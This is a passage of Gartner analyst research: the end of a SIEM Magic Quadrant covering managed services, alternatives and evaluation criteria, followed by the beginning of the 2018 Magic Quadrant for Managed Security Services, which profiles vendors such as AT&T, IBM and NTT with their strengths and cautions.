Gartner customers increasingly indicate that they are seeking external service support for their SIEM deployment, or are planning to acquire that support in conjunction with an SIEM product (see “How and When to Use Co-managed SIEM” ). Motivation to seek external services includes lack of internal resources to manage a SIEM deployment, lack of resources to perform real-time alert monitoring or lack of expertise to expand the deployment to include new use cases (such as those for advanced threat detection). We expect that demand by SIEM users for such services will grow, driven by more customers adopting 24/7 monitoring requirements and implementing use cases that require deeper SIEM operational and analytics expertise.

SIEM vendors may support these needs via managed services with their own staff or outsourcing services, or using partners. SIEM offered as a service includes the maintenance of the platform by the vendor, with customers using their own resources (or other service providers) to configure content and monitor and investigate events. Managed security service providers, which offer real-time monitoring and analysis of events, and collect logs for reporting and investigation, are another option for SIEM users. (see “Innovation Insight for SIEM as a Service” ). For basic use cases, severely resource-constrained customers may opt for SaaS-type log management services from Loggly, Sumo Logic or others that have some security utility, but also cover operational use cases. Customer-specific requirements for event collection and storage, alerting, investigation, and reporting may prove problematic for external service providers, and SIEM users exploring services should evaluate the fit of the service provider to meet current and planned use cases.

SIEM Alternatives

The complexity and cost of SIEM, as well as emerging security analytics technologies, have driven interest in alternative approaches to collecting and analyzing event data to identify advanced attacks. The combination of Elasticsearch, Logstash and Kibana (also known as the ELK stack or Elastic Stack); Apache Spot; Apache Metron; and other tools leveraged with or natively using big data platforms like Hadoop offer data collection, management and analytics capabilities. Organizations with sufficient resources to deploy and manage these, and develop and maintain analytics to address security use cases, may be able to get a solution that addresses a sufficient number of their requirements for a lower cost compared with commercial technologies. Gartner continues to track the development of this approach, and there is some feedback from customers that the workload involved in engineering these solutions to scale and the development effort to support the required event sources and analysis is significant, despite the software itself being free. This may negate the objective of being less expensive than a commercial SIEM deployment .

Organizations that lack the resources and process maturity for SIEM deployment and support, and that cannot or choose not to engage an MSSP for monitoring, can meet basic logging and review requirements with log management technologies (or services) such as Graylog or Sumo Logic with no, or very limited, security use cases supported out of the box (see “Use Central Log Management for Security Event Monitoring Use Cases” ).

There are a number of providers offering managed detection and response (MDR) services that differ from those of MSSPs, with the goal of identifying and responding to advanced threats in the customer environment — typically through the analysis of selected network and endpoint data (see “Market Guide for Managed Detection and Response Services” ). The scope of services and event sources is typically smaller than those available from an MSSP, or covered by a SIEM deployment. As such, they do not typically compete directly against the SIEM vendor or MSSP, where customers have broader use-case requirements. However, the MDR services claim effective advanced threat detection capabilities, and may compete for SIEM budget in organizations with sufficient resources to support those use cases. Gartner will continue to monitor the space to assess how MSS, MDR, logging and SIEM interact and intersect.

Evidence

Sources of information to support this analysis include feedback from Gartner customers gathered through inquiry calls, face-to-face meetings and survey/polling tools; vendor information supplied in response to a survey, product demonstration and briefings; and vendor reference opinions gathered via polling tool.

Evaluation Criteria Definitions

Ability to Execute

Product/Service: Core goods and services offered by the vendor for the defined market. This includes current product/service capabilities, quality, feature sets, skills and so on, whether offered natively or through OEM agreements/partnerships as defined in the market definition and detailed in the subcriteria.

Overall Viability: Viability includes an assessment of the overall organization’s financial health, the financial and practical success of the business unit, and the likelihood that the individual business unit will continue investing in the product, will continue offering the product and will advance the state of the art within the organization’s portfolio of products.

Sales Execution/Pricing: The vendor’s capabilities in all presales activities and the structure that supports them. This includes deal management, pricing and negotiation, presales support, and the overall effectiveness of the sales channel.

Market Responsiveness/Record: Ability to respond, change direction, be flexible and achieve competitive success as opportunities develop, competitors act, customer needs evolve and market dynamics change. This criterion also considers the vendor’s history of responsiveness.

Marketing Execution: The clarity, quality, creativity and efficacy of programs designed to deliver the organization’s message to influence the market, promote the brand and business, increase awareness of the products, and establish a positive identification with the product/brand and organization in the minds of buyers. This “mind share” can be driven by a combination of publicity, promotional initiatives, thought leadership, word of mouth and sales activities.

Customer Experience: Relationships, products and services/programs that enable clients to be successful with the products evaluated. Specifically, this includes the ways customers receive technical support or account support. This can also include ancillary tools, customer support programs (and the quality thereof), availability of user groups, service-level agreements and so on.

Operations: The ability of the organization to meet its goals and commitments. Factors include the quality of the organizational structure, including skills, experiences, programs, systems and other vehicles that enable the organization to operate effectively and efficiently on an ongoing basis.

Completeness of Vision

Market Understanding: Ability of the vendor to understand buyers’ wants and needs and to translate those into products and services. Vendors that show the highest degree of vision listen to and understand buyers’ wants and needs, and can shape or enhance those with their added vision.

Marketing Strategy: A clear, differentiated set of messages consistently communicated throughout the organization and externalized through the website, advertising, customer programs and positioning statements.

Sales Strategy: The strategy for selling products that uses the appropriate network of direct and indirect sales, marketing, service, and communication affiliates that extend the scope and depth of market reach, skills, expertise, technologies, services and the customer base.

Offering (Product) Strategy: The vendor’s approach to product development and delivery that emphasizes differentiation, functionality, methodology and feature sets as they map to current and future requirements.

Business Model: The soundness and logic of the vendor’s underlying business proposition.

Vertical/Industry Strategy: The vendor’s strategy to direct resources, skills and offerings to meet the specific needs of individual market segments, including vertical markets.

Innovation: Direct, related, complementary and synergistic layouts of resources, expertise or capital for investment, consolidation, defensive or pre-emptive purposes.

Geographic Strategy: The vendor’s strategy to direct resources, skills and offerings to meet the specific needs of geographies outside the “home” or native geography, either directly or through partners, channels and subsidiaries as appropriate for that geography and market

Magic Quadrant for Managed Security Services, Worldwide

Magic Quadrant for Managed Security Services, Worldwide

 

Published: 27 February 2018 ID: G00325535

Analyst(s):

 

Summary

Security and risk management leaders interested in managed security services for threat detection, security technology management and compliance concerns should use this Magic Quadrant to help identify and evaluate providers with the ability to deliver services globally.

Market Definition/Description

Gartner defines managed security services (MSSs) as “the remote monitoring of security events and security-related data sources, or the management of IT security technology along with security event monitoring, delivered via shared services from remote security operations centers (SOCs), not through personnel on-site nor remote services delivered on a one-one basis to a single customer.”

Managed security service providers’ (MSSPs’) portfolios typically include the following services:

  • Security event monitoring only, or security event monitoring along with device/agent monitoring and management, primarily in the following categories:
    • Firewalls
    • Network-based threat detection technologies, such as network intrusion detection/prevention systems (IDPS)
    • Multifunction firewalls, or unified threat management (UTM) technology
    • Security gateways for messaging or web traffic
    • Web application firewalls
    • Endpoint protection platforms (EPPs), host intrusion detection/prevention systems (HIDS/HIPS) and endpoint detection and response (EDR)
  • Security analysis and reporting of events collected from IT infrastructure and application logs
  • Reporting for service management, regulatory compliance requirements and threat detection purposes
  • Management and monitoring, or monitoring only of advanced threat defense technologies, or the provision of those capabilities as a service
  • Vulnerability scanning delivered as a service
  • Management and monitoring of customer-deployed security information and event management (SIEM) technologies
  • Incident response services (both remote and on-site)

Services, such as the ones listed below, may also be part of MSS offerings, but are not common across all providers:

  • Distributed denial of service (DDoS) protection
  • Advanced threat intelligence services (e.g., dark web monitoring)
  • Secure messaging gateways, secure web gateways and web application firewalls delivered “as a service”
  • Managed vulnerability management (e.g., end-to-end management that includes scanning, prioritization and patching on behalf of the customer)
  • Identity and access management

This Magic Quadrant evaluation primarily focuses on the services for monitored, and managed and monitored, network security devices, host-based agents, and log event analysis and reporting services for other sources required by the buyer. These functions make up the core of MSS procurements.

There are no vendors appearing in the Visionaries quadrant of this Magic Quadrant. MSS is a mature market with a core set of services that appear in most MSS engagements.

Magic Quadrant

Figure 1. Magic Quadrant for Managed Security Services, Worldwide

Research image courtesy of Gartner, Inc.

Source: Gartner (February 2018)

Vendor Strengths and Cautions

AT&T

AT&T is a global telecommunications and IT services provider that offers a range of security device management and monitoring services for large enterprises, midsize businesses and governments. Headquartered in the U.S. (Dallas), and with regional offices in the U.K. (London) and Hong Kong, AT&T delivers services from five 24/7 SOCs (one Europe-based, one Asia/Pacific-based and three U.S.-based) and three SOCs operating local business hours (one in the Asia/Pacific region, one in Brazil and another in Europe). Customers served by an SOC operating local business hours and seeking after-hours support are routed to a 24/7 location with local language support. AT&T Threat Manager is its security event monitoring and management service, which is priced by events per day (EPD). Threat correlation and analysis is performed via the AT&T Threat Intellect platform, which leverages both commercial SIEM technologies and big data technologies and analytics, and is delivered to customers as part of AT&T’s Threat Management and Intelligence solutions. Device management is available through discrete managed security offerings for network security, data and application security, and mobile and endpoint security. Device management and workflow is handled through the AT&T Business Center portal, which also provides access to the Threat Manager view. The vendor offers threat intelligence via the AT&T Internet Protect service. AT&T supports in-country/customer premises data management in all regions, and can use local partners for device management to meet data residency requirements.

AT&T should be considered by organizations with a preference for services to be sourced from a single supplier, particularly managed network services and IT infrastructure security controls that need to be deployed, managed and monitored across the customer’s environment (both on-premises and cloud services) and the provider’s environment.

STRENGTHS
  • AT&T provides a wide scope of security-focused managed and monitoring services, with a strength in network-based security solutions. The security portfolio complements its managed network infrastructure and service offerings.
  • AT&T provides an integrated business portal where customers can access a variety of services, including accessing the Threat Manager portal along with portals for device management and vulnerability management services. The Threat Manager portal provides a strong user experience for both analysts and management personas, including customized dashboards, a risk trend feature and case management.
  • AT&T has moderate visibility with Gartner clients considering discrete MSSs.
CAUTIONS
  • AT&T provides support for Amazon Web Services (AWS) environment monitoring, but lacks support for Microsoft Azure and a limited set of SaaS providers (e.g., Office 365, Box and Salesforce are supported). Cloud access security broker (CASB) support is limited to SkyHigh Networks. Buyers should confirm support for their preferred SaaS vendors and other CASB vendors.
  • Customers wanting to leverage advanced threat detection technologies should confirm AT&T’s ability to monitor, and manage, preferred solutions as required, through either standard or custom delivery. AT&T has introduced a network-based forensic service that is only available to U.S. customers at this time due to data privacy restrictions. Customers outside the U.S. that are interested in this service should confirm future availability.
  • AT&T’s MSS business is most visible in the North American market, with lower visibility in Europe and little in the Asia/Pacific market. Buyers requiring a strong presence in the Asia/Pacific region should closely evaluate AT&T’s coverage there.

Atos

Atos is a global IT, digital service and software company with headquarters near Paris and regional offices in the U.S. (Purchase, New York) and Singapore. In addition to the vendor’s MSSs under the Cyber Security Services business, Atos provides a wide range of consulting, system integration, managed IT services and other offerings. Atos’ MSSs are delivered through a network of 14 24/7 SOCs (three in the U.K., six in continental Europe, two in the U.S., two in India and one in Malaysia). Atos recently acquired Anthelio Healthcare Solutions, providing capabilities in the Internet of Things (IoT)/OT space for managing privacy and compliance risks in the North American market. Atos provides threat intelligence and vulnerability notifications to customers using tools and services from partners like McAfee and Tripwire. Atos offers incident response and remediation activities as part of its core services in the form of forensic analysis and custom malware analysis, as well as offering optional threat hunting services and EDR leveraging CrowdStrike, for example. Advanced threat detection and monitoring services are available as part of Atos’ Prescriptive Security SOC offering, which leverages Atos’ proprietary big data analytics solution (Atos Codex) as well as technologies like user and entity behavior analytics (UEBA). In addition, IT/OT/IoT SOC services are developed and delivered together with Siemens.

Atos’ existing IT services customers and European-headquartered organizations with global coverage requirements that want a provider that can deliver end-to-end security management and monitoring services should consider the vendor for MSSs.

STRENGTHS
  • Customers requiring advanced analytics capabilities can opt for Atos’ flexible options leveraging Atos Codex, leading UEBA technologies or both.
  • Atos has a range of experience in securing transformational digital business projects within large enterprises, driven by its wider range of IT services engagements.
  • Atos supports customers that require end-to-end security management, monitoring and response, and offers standardized and customized solutions.
  • Atos partners with leading security technology vendors in areas such as network traffic analytics, endpoint protection, EDR, DDoS mitigation and encryption.
CAUTIONS
  • Atos Codex is currently only available to customers that opt for a dedicated McAfee SIEM platform. Atos indicates that adding Codex to the shared platform is on its roadmap. Customers that plan to leverage their shared SIEM platform and want advanced analytics capabilities should confirm availability.
  • Atos’ MSS portal is oriented toward reporting and dashboards to communicate information to customers, and provides limited support for bidirectional customer interaction.
  • Atos can monitor SaaS vendors supported within the McAfee Enterprise Security Manager (ESM) solution. Buyers should confirm support for monitoring of their preferred SaaS vendors and CASB solutions.
  • Atos is rarely mentioned by Gartner clients interested in stand-alone MSS engagements.

BAE Systems

BAE Systems, headquartered in Farnborough, U.K., offers a range of products and services in areas such as national defense, financial services and cybersecurity to industry and governments. The MSS group is headquartered in Guildford, U.K., with key offices in New York City, Dubai, Singapore and Sydney. Its offerings include Security Event Monitoring (SEM), Complete Security Monitoring (CSM), Managed Detection and Response (MDR), and Security Device Management (SDM). Services are delivered using five 24/7 SOCs — one in the U.K., three in the U.S. and one in the Philippines. Data residency requirements are typically met by retaining data locally and in geospecific cloud infrastructure. In the Asia/Pacific region, a local partner delivers services and cloud storage is not yet available. The BAE analytics platform uses a combination of commercial SIEM technologies and a big data and analytics, Hadoop-based platform. BAE supports common IaaS and security-as-a-service vendors such as Amazon CloudFront, AWS CloudTrail, Symantec.cloud, Cisco ScanSafe and Proofpoint. On-site and remote incident and breach response services are available via retainer.

BAE Systems has a customer base in EMEA of large enterprise businesses, primarily leveraging its CSM and MDR services, and a large small or midsize business (SMB) customer base in North America, primarily leveraging its NSM and SDM services. The vendor delivers its MSS offering using a combination of proprietary and commercial solutions, depending on the customer’s region and based on data privacy or residency requirements.

Companies in the financial services, legal, healthcare, media, critical infrastructure and defense markets that need a range of security monitoring, device management and advanced threat defense solutions should consider BAE Systems.

STRENGTHS
  • Advanced detection capabilities are supported by proprietary BAE Systems technology with its passive Network Probe Sensor and EDR agent. Customers that have not deployed commercial technologies for these functions can have these capabilities provided as a service.
  • BAE Systems’ MSS is augmented by a range of incident response services, including response and threat containment capabilities that are built into the MSS relationship, retainer-based response contracts, and incident response program development services.
  • Customer marks on BAE Systems’ threat detection capabilities are above average.
CAUTIONS
  • Most BAE Systems customers are in North America, with a small number in the Europe and Asia/Pacific regions. In the Asia/Pacific region, a partner delivers services for customers that require local data storage. Prospective customers with data residence or service delivery requirements specific to the Asia/Pacific region should validate the availability of services from BAE Systems.
  • The MSS portal offers limited reporting capabilities and management of vulnerability scans comparted to those of leading competitors. Threat intelligence is provided through a separate portal.
  • SaaS monitoring is limited to Office 365. There are no MSS integrations with CASB solutions. BAE Systems indicates that support for CASB vendors is on its roadmap.

BT

BT is headquartered in London with key offices globally, including London, Hong Kong and Dallas. BT has six European SOCs and four Asia/Pacific region SOCs providing 24/7 service, with an additional four non-24/7 SOCs worldwide. BT provides a range of telecommunications, cloud-enabled hosting, cloud brokering and integration, and collaboration services, in addition to managed security services. BT’s MSS offerings have been under the BT Security brand name since 1Q17. BT Security’s MSS portfolio includes a range of offerings primarily within the Managed Security Services and Security Intelligence portfolios. Security Intelligence includes services such as Security Log Management (SLM), Security Threat Monitoring (STM), Cyber Security and Security Threat Intelligence. Technology management is under Managed Security Services and includes managed firewalls, DDoS, web, email, PKI and cloud security. Additional offerings include Security Vulnerability Scanning (SVS) for managed vulnerability scanning and Managed SIEM for McAfee ESM, LogRhythm and IBM QRadar customers. BT’s strategy for managed security services is evolving to emphasize its Managed SIEM and Cyber Security Platform offerings for existing BT customers and global enterprise buyers that require more one-to-one-oriented services, as opposed to delivery using a shared analytics platform that this research primarily assesses. BT has two separate portals for security technology management (Security Hub) and monitoring services (Security Threat Monitoring), which BT has been revamping over the last 12 months. Consulting services are available to meet a variety of customer demands. Incident response support, available as a retainer, is delivered in partnership with FireEye-Mandiant and other firms. BT can meet requirements for data residency with in-region/in-country service provision and citizenship requirements for SOC staff.

Global enterprises seeking global MSS capabilities to satisfy complex security requirements should consider BT.

STRENGTHS
  • BT can support customers that require integrated cloud services (hosting and/or brokering) and MSSs, especially security threat monitoring.
  • BT has many partnerships with security technology and service vendors that are leveraged to provide broad support for device management, as well as threat monitoring services. Customers requiring custom solutions will also benefit from these partnerships.
  • Customers give BT above-average marks for overall service satisfaction.
CAUTIONS
  • BT’s efforts to upgrade its portal have resulted in incremental improvements, with further enhancements planned. Customer self-service options in these portals for basic functions, like account management, ticket ownership and management, and interacting with SOC staff, are very limited compared to competitors.
  • BT’s own big data technology and advanced analytics capabilities are currently limited to buyers purchasing its Cyber Security Platform (CSP), which can be delivered as a stand-alone on-premises or hosted solution. BT indicates elements of CSP are on the roadmap to be extended to other BT Security services, such as STM.
  • BT has low visibility with Gartner clients for stand-alone MSS deals. MSSs are commonly bundled with larger networking, cloud services and cybersecurity (e.g., on-premises SOC build-outs) initiatives with BT.

Capgemini

Capgemini, with headquarters in Paris and regional offices located in North America, Europe and the Asia/Pacific region, provides MSS as part of its Cybersecurity Services business. Capgemini delivers services from seven 24/7 SOCs located in India (Mumbai and Bangalore), and regional SOCs in Luxembourg; Toulouse, France; Madrid; and Inverness, Scotland, for customers with data residency and sovereignty requirements. There is one non-24/7 SOC in India. Capgemini provides a variety of MSSs. Log management and security event monitoring are supported via its shared QRadar SIEM solution, with flexible options for dedicated QRadar instances. Support for five SIEM solutions (Huntsman Enterprise SIEM, Micro Focus ArcSight, McAfee ESM, RSA NetWitness and Splunk) based on customer preference or for customers wanting management of their existing SIEM tool. Customer access to services is via the MSS Portal, which provides a basic dashboard, case management and reporting-oriented interface to the services provided to customers. Capgemini provides a tiered service approach (Bronze, Silver and Gold) to MSS buyers based on level of services and support required. Additional services include management and monitoring for vulnerability scanners, firewalls, endpoint protection, NIDS/NIPS, web application firewalls (WAFs), CASB, and data loss prevention. Additional services are available that cover consulting and advisory, identity and access management, and DDoS, among others.

MSS buyers looking for flexible options for SIEM tools and a wide portfolio of device management and security monitoring services, as well as existing Capgemini customers, should consider Capgemini for MSS.

STRENGTHS
  • Capgemini offers support for a wide variety of SIEM solutions, as well as other security technologies.
  • Capgemini leverages its own threat intelligence network for gathering intelligence to complement third-party commercial sources, which is utilized by its SOC and visible to customers.
  • There is local and regional data residency and sovereignty support for European customers via dedicated local SOCs and data centers.
  • Capgemini offers specific consulting and security monitoring services tailored to customers with ICS/SCADA and IoT environments.
CAUTIONS
  • Capgemini’s portal lags competitors as its focus is on service visibility, management and reporting. Features like log searching and compliance reporting are not yet supported. Capgemini is actively adding enhancements to the portal, and has recently introduced support for multifactor authentication, a chat function with SOC staff and the ability to import vulnerability scanner data.
  • North American and Australian customers requiring that services be delivered domestically should confirm plans for future expansion of SOCs in those regions.
  • Capgemini has limited visibility with Gartner clients for MSS-specific deals. Capgemini’s MSS deals are often included as part of end-to-end cybersecurity outsourcing or digital transformation initiatives.

CenturyLink

CenturyLink is based in Monroe, Louisiana, and has regional offices in Singapore and London. On 1 November 2017, CenturyLink completed the acquisition of Level 3 Communications, expanding its global presence and security service portfolio. CenturyLink provides telecommunications and public and private cloud services, in addition to MSSs. MSS can be acquired as a stand-alone service or as an add-on to other CenturyLink services. With the acquisition of Level 3, CenturyLink now has more than five 24/7 SOCs operating on four continents, including North America, Europe (London), Asia/Pacific (Singapore) and Latin America (Buenos Aires, Argentina, and Sao Paulo, Brazil). There are dedicated North American and U.K. SOCs to support national government contracts. CenturyLink provides a full scope of monitoring and management activities across a broad spectrum of security platforms, including next-gen firewalls, UTM systems, network and host IPS, WAF, VPN, EPP, email and web security, vulnerability scanning, threat intelligence services (from both legacy CenturyLink and Level 3), and advanced threat-oriented capabilities (e.g., network customer traffic analyzed against threat intelligence and advanced analytics for behavioral anomalies). CenturyLink uses a combination of proprietary implementations of big data platforms and other tools (such as from its previous acquisition of Cognilytics) and commercial products to collect, store and analyze customer log data and manage workflow. There are several service tiers available, from basic endpoint security management to advanced threat-oriented capabilities. Incident response, including on-site breach response services, is available with a retainer fee. Some data residency and staff citizenship requirements can be met with in-region SOCs and data storage. The pricing model for MSS depends on the services taken and includes set monthly recurring or usage-based fees; for example, threat monitoring is based on GB-per-day data.

Existing network services, infrastructure as a service (IaaS) and cloud service customers, as well as organizations with global service requirements, should consider CenturyLink for MSSs.

STRENGTHS
  • The MSS portal, which continues to see ongoing enhancements, provides fine-grained role mapping and access for users, and provides easy-to-use report creation and customization features.
  • CenturyLink offers several options for storing customer log data ranging from customer premises to regional CenturyLink data centers to commercial or CenturyLink cloud infrastructure.
  • CenturyLink’s expansion of its global SOC presence, which also increased with the acquisition of Level 3, now offers customers a local presence in four continents.
  • Customers give CenturyLink good marks for the ability to detect threats, and would generally recommend the service to other buyers.
CAUTIONS
  • All managed services are available across the globe, except for services leveraging EDR and endpoint forensic tools, which may be limited to specific tools depending on the customer’s geography. Advanced threat detection and forensics capability based on packet capture and analysis is not yet available, but is planned for 2018. Organizations seeking support for these tools, particularly use of EDR tools outside of the U.S., should validate timing and support availability with CenturyLink.
  • CenturyLink has made enhancements to its portal over the last 12 months, but the portal still has limited features for capturing and using assets and their business value, and does not currently support integrations to enable managing vulnerability scans or viewing scan results.
  • CenturyLink has low visibility with Gartner clients for stand-alone MSS deals. CenturyLink’s current focus is selling MSSs to existing enterprise customers, although it does sell discrete MSSs to non-CenturyLink customers.

DXC Technology

DXC Technology, a newly formed entity as the result of the merger of CSC and Hewlett Packard Enterprise’s (HPE’s) Enterprise Services business, is headquartered in Tysons, Virginia. The merger formally concluded in March 2017. The vendor has 16 SOCs across the Americas, EMEA and the Asia/Pacific region. DXC offers a range of security implementation and consulting services other than MSSs for enterprise and government customers. In addition to security monitoring and device management, DXC does offer additional standard managed services like managed SIEM, managed EDR, vulnerability assessment and DDoS protection, among others. The vendor differs from many other MSSPs in that it offers a range of managed services around identity and access management, such as Identity Management as a Service and Privileged Account Management. As an MSS provider, DXC is currently in a state of consolidation and change, in terms of both the technology platforms used for MSS delivery and new services that the provider is planning to introduce.

Customers requiring globally delivered MSS, especially those looking for a partner that also offers additional IT and security services, should consider DXC for MSSs.

STRENGTHS
  • DXC has a large revenue and incumbent base of security service customers, and has the ability to support large enterprise engagements across geographies.
  • DXC has a large partner network for security technologies and a strong portfolio of supported technologies, in addition to an extensive set of security-related service offerings.
  • DXC can support customers with hybrid cloud environments that require security monitoring and management services.
CAUTIONS
  • Postmerger of HPE’s Enterprise Services business and CSC, DXC still continues to support two separate portals for its MSS customers. Several key portal elements are in a basic stage or still in the process of being introduced to the customer portals (asset management, multilanguage support, reporting, etc.). A focus on log storage and search capabilities using big data technologies is currently being deployed globally.
  • Due to the merger, DXC has 16 SOCs across the world today, with a stated intention to consolidate the number of SOCs with the same local areas. Customers and prospects should carefully investigate the impact of this planned consolidation on the delivery of their service.
  • DXC, particularly as a new brand, rarely shows up on Gartner client shortlists for pure-play MSS deals.

Fujitsu

Fujitsu is headquartered in Tokyo, with key offices in London; Munich; Lisbon; Richardson, Texas; and Sunnyvale, California. Fujitsu has a large operational presence in Europe and Japan, with 24/7 SOCs in Japan (nine total), Australia, Singapore, India, Germany, the U.K., Finland and the U.S. Fujitsu’s security portal is primarily based on its underlying delivery platform based on LogRhythm’s SIEM solution. Fujitsu has an in-house Cyber Threat Intelligence (CTI) capability, which leverages a range of commercial and open-source feeds and partnerships with third parties, that underpins the threat analytics and detection capabilities within its MSSs. The CTI capability is also delivered as a stand-alone offering. Incident response support and consultancy is available as a retainer. Advanced threat detection capabilities for endpoint and networks, as well as sandboxing, leverage technology from partners such as FireEye, Check Point Software Technologies, McAfee, Symantec and others. Malware analysis is available on a range of commercial and open-source toolsets, and forensic analysis is delivered via Fujitsu consulting and partners as needed.

Buyers, including existing Fujitsu IT services customers, should consider Fujitsu for MSSs if they are looking for a provider that offers flexibility for service delivery, or if they already have IT services that can be easily integrated and would benefit from security enhancements.

STRENGTHS
  • Fujitsu provides managed services across a wide portfolio of technologies, including firewalls, UTM, endpoint protection and encryption, IDS/IPS, WAFs, VPN and remote access services, email security, data loss prevention, and identity and access management, in addition to its CTI, threat analytics and advanced threat detection offerings.
  • Fujitsu’s reach in the Asia/Pacific region and Europe is strong.
  • Fujitsu leverages leading SIEM technologies to deliver its security event monitoring and threat analytics and detection capabilities.
CAUTIONS
  • Fujitsu’s technology integrations, partnerships and service delivery methodology for MSS are less mature compared to competing vendors.
  • Fujitsu’s security portal is based purely on access to its LogRhythm platform. Service management functionality, including ticket management, customer communications and management dashboards, lags behind competitors.
  • Fujitsu has very low visibility with Gartner clients looking for discrete MSSs.

HCL Technologies

HCL Technologies is a global IT services provider that offers a range of IT and security services aimed at buyers, primarily through broad-scope IT outsourcing engagements. HCL is headquartered in Noida, India (with regional headquarters in London and Sunnyvale, California). MSS is a part of HCL’s Cybersecurity and GRC services provided via six 24/7 MSS SOCs worldwide (four in India, and one each in Europe and the U.S.). MSS is delivered using commercially available SIEM technologies (IBM QRadar, Micro Focus ArcSight, RSA NetWitness and Splunk), chosen in consultation with the customer. SIEM solutions are leveraged for log collection and management, and real-time security event monitoring and analysis. HCL also offers dedicated managed SIEM options. The vendor provides managed EDR, with multiple technology options available to customers, in addition to threat hunting services. SecIntAl is HCL’s branding for its big-data-based security analytics and threat intelligence capability that underpins the analytics for its threat monitoring services.

HCL’s portal provides a single dashboard-oriented interface across all supported SIEM tools, vulnerability management, endpoint management and CMDB services. Dedicated views in the portal support both analysts and leader personas. HCL supports a variety of third-party security technologies. In addition to firewalls, IDPSs and secure web gateways (SWGs), it also supports a variety of solutions like EDR, CASB, network traffic analysis (NTA) and vulnerability management. Related services, like incident and breach response, are provided by select partners.

Organizations engaged in IT outsourcing and technology transformation projects, buyers looking for providers to use their preferred SIEM tool and broad-based support for security technologies, and existing HCL Technologies customers should consider HCL for MSSs.

STRENGTHS
  • MSS customers can leverage HCL’s support for security technologies across a wide range of markets for product procurement, implementation and management. HCL’s MSS delivery approach is customizable to customers’ requirements and existing security technology solutions.
  • HCL offers a lot of flexibility for buyers with broad and complex security monitoring and management requirements across on-premises, SaaS, IaaS and PaaS environments.
  • Customers generally give HCL above-average marks across acquisition, implementation and overall services.
CAUTIONS
  • HCL Technologies’ portal is mainly focused only on service visibility through predefined dashboards and reports. Search functionality has been enhanced in the last 12 months, but is limited to 30 days of online data by default.
  • Customers looking for a turnkey security event monitoring service leveraging a shared delivery platform (e.g., no preference for an SIEM solution or bringing their own SIEM tool) should confirm with the vendor which SIEM solution will be used for the service and whether it meets buyers’ requirements and supports existing technologies (security and IT log event sources).
  • HCL Technologies is rarely mentioned in Gartner client inquiries for discrete MSSs as most HCL customers procure MSSs in conjunction with other outsourcing initiatives.

IBM

IBM is headquartered in Armonk, New York, with MSS offices in the U.S. (Atlanta and Cambridge, Massachusetts); London; Brussels; and Hortolandia, Brazil. IBM offers a broad range of MSSs, security consulting and incident response, either as stand-alone offerings or as part of larger IT services and outsourcing engagements. MSSs are delivered from five 24/7 SOCs, called X-Force Command Centers: one in the U.S.; one in San Jose, Costa Rica; one in Hortolandia, Brazil; one in Tokyo and one in Wroclaw, Poland. IBM has three additional non-24/7 SOCs in India, Belgium and the U.S. IBM uses its QRadar SIEM solution to deliver unified monitoring across MSS, regardless of the location of the QRadar platform — shared multitenant, on-premises or as a service. There are four MSS tiers available, ranging from basic endpoint security to highly customized services. IBM’s advanced analytics and targeted attack detection capabilities for the network and hosts include support for customer-deployed products, IBM products (e.g., QRadar modules) and strategic partner solutions (e.g., Carbon Black for IBM Security’s Managed Detection and Response service). Threat intelligence and incident response services, as well as security consulting services, are available. Support for data residency requirements is available through European Commission Model Clauses contract language, local data centers in the customer’s region supported by EU staff out of the Poland SOC, and use of on-premises QRadar SIEM or using SIEM as a service hosted within IBM Cloud within region.

Large enterprises with global service delivery requirements looking for flexible security event monitoring technology options, and those with strategic relationships with IBM, should consider IBM for MSSs.

STRENGTHS
  • IBM’s “QRadar Anywhere” approach provides flexible options for IBM QRadar SIEM customers that require managed SIEM options. Customers can migrate from the shared MSS platform to co-managed on-premises or QRadar on Cloud, or vice versa, as strategies evolve.
  • IBM MSS delivery is supported by a range of strong threat intelligence partners, including IBM’s X-Force Security Research, third-party commercial sources and data collected via the vendor’s in-house incident response services.
  • IBM has moderate visibility with Gartner clients considering MSSs. IBM’s visibility for co-managed SIEM opportunities, however, is growing in favor of discrete MSSs.
CAUTIONS
  • Customers report the IBM sales process is uneven in its ability to engage with them effectively, such as the lack of responses to RFPs. Customers also report mixed satisfaction with IBM’s delivery of MSS services. Marks are lower than competitors in areas like overall service capabilities and overall experience.
  • Buyers should carefully analyze the technology approach recommended to deliver MSSs (e.g., shared or dedicated QRadar, whether on-premises or hosted) to ensure that the approach is compatible with their IT environments, architectures and requirements.
  • IBM offers a managed EDR service that is used for real-time threat detection and threat hunting purposes, but it has little visibility with buyers.

NTT

NTT brings together the MSS-specific resources and delivery platforms of NTT Com Security, Solutionary, Dimension Data, NTT Communications, NTT DATA and technology from the NTT Innovation Institute. NTT Security has been established as the specialized security company of the NTT Group. NTT is headquartered in Tokyo, with regional headquarters for North America, Europe and the Asia/Pacific region. NTT offers a broad range of security professional services and integration and incident response services. NTT Security has 17 24/7 MSS SOCs globally: six in the Asia/Pacific region, five in Europe and six in North America. In 2017, NTT progressed toward integrating its three separate platforms used for delivering MSS. Its new operating model is similar in nature to a channel-based approach in that NTT Security doesn’t directly sell services, instead relying on its group companies, which have varying levels of coverage and support in the different geographies. NTT is actively migrating North American and Japan customers to its new Global Managed Security Services Platform (GMSSP), while EMEA and remaining Asia/Pacific region customers continue to use the existing WideAngle and ArcSight ESM-based platforms. NTT Security MSSs are sold via the NTT Group companies of Dimension Data, NTT Communications and NTT DATA.

Customers of NTT operating companies, and enterprises seeking a large global provider, should consider NTT for MSSs.

STRENGTHS
  • NTT can bundle MSS with a wide range of security service offerings and delivery options, including broader telecommunications and IT infrastructure service offerings.
  • NTT has the ability to serve a wide range of industries/verticals across geographies due to the NTT Group companies’ global presence.
  • The new NTT Security portal (GMSSP) has a good range of roles available, with some customization and self-service capabilities available to customers. Integrations with NTT Group companies and customers to the GMSSP are supported via a RESTful API.
  • NTT has moderate visibility with Gartner clients looking for discrete MSSs.
CAUTIONS
  • NTT Security has moved its security sales team to the NTT Group companies while the delivery of the service happens through NTT Security, which is a separate group. This may create misalignment between the sales/marketing and product management/engineering functions, and may create confusion for customers that wish to purchase MSS from NTT Security.
  • Many of NTT’s EMEA and Asia/Pacific region customers are still on their older portals and delivery platforms. MSS customers should get clarity from their NTT Group company provider regarding plans to migrate to the new portal without affecting service continuity and while maintaining service features.
  • While there is a managed EDR offering with Carbon Black, FireEye and CounterTack, NTT is behind some of its competitors in introducing advanced threat-detection-oriented services relative to threat hunting and network monitoring.

Orange Business Services

